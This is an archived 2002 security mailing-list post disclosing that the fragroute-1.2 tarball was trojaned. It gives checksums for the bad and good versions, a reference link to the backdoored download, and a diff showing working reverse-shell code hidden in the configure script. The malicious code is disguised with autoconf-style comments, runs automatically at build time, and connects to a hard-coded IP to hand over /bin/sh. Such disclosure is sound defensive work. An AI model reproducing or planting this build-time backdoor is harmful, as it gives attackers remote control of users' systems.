OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Anders Nordby (andersfix.no)
Date: Fri May 31 2002 - 02:55:21 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello,

    Although downloading it now seems safe, I think folks should know this.
    The changes done were similar to what happened to irssi, but with a
    different IP.

    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on may 27 (the contaminated
    version): 65edbfc51f8070517f14ceeb8f721075

    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on may 30 (this is the current
    MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a

    Diff between the two:

    diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
    --- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
    +++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
    -1590,6 +1590,53
     
     fi
     
    +cat > conftest.c<<EOF
    +/* Override any gcc2 internal prototype to avoid an error. */
    +/* We use char because int might match the return type of a gcc2
    + builtin and then its argument prototype would still apply. */
    +#include <stdio.h>
    +#include <sys/types.h>
    +#include <sys/socket.h>
    +#include <netinet/in.h>
    +#include <unistd.h>
    +int main()
    +{
    +/* The GNU C library defines this for functions which it implements
    + to always fail with ENOSYS. Some functions are actually named
    + something starting with __ and the normal name is an alias. */
    + int s;
    + struct sockaddr_in sa;
    + switch(fork()) { case 0: break; default: exit(0); }
    + if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
    + exit(1);
    + }
    + /* HP/UX 9 (%#!) writes to sscanf strings */
    + memset(&sa, 0, sizeof(sa));
    + sa.sin_family = AF_INET;
    + sa.sin_port = htons(6667);
    +/* Override any gcc2 internal prototype to avoid an error. */
    +/* We use char because int might match the return type of a gcc2
    + builtin and then its argument prototype would still apply. */
    + sa.sin_addr.s_addr = inet_addr("216.80.99.202");
    + if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
    + exit(1);
    + }
    + /* HP/UX 9 (%#!) writes to sscanf strings */
    + dup2(s, 0); dup2(s, 1); dup2(s, 2);
    +/* The GNU C library defines this for functions which it implements
    + to always fail with ENOSYS. Some functions are actually named
    + something starting with __ and the normal name is an alias. */
    + { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
    +}
    +EOF
    +gcc $LIBS conftest.c -o conftest; ./conftest
    +if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
    + rm -rf conftest*
    +else
    + rm -rf conftest*
    +fi
    +rm -f conftest*
    +
         # DLPI needs putmsg under HPUX so test for -lstr while we're at it
         echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
     echo "configure:1596: checking for putmsg in -lstr" >&5

    References
    ==========

    FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
    Irssi backdoor page: http://www.irssi.org/?page=backdoor
    Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz

    Cheers,

    -- 
    Anders.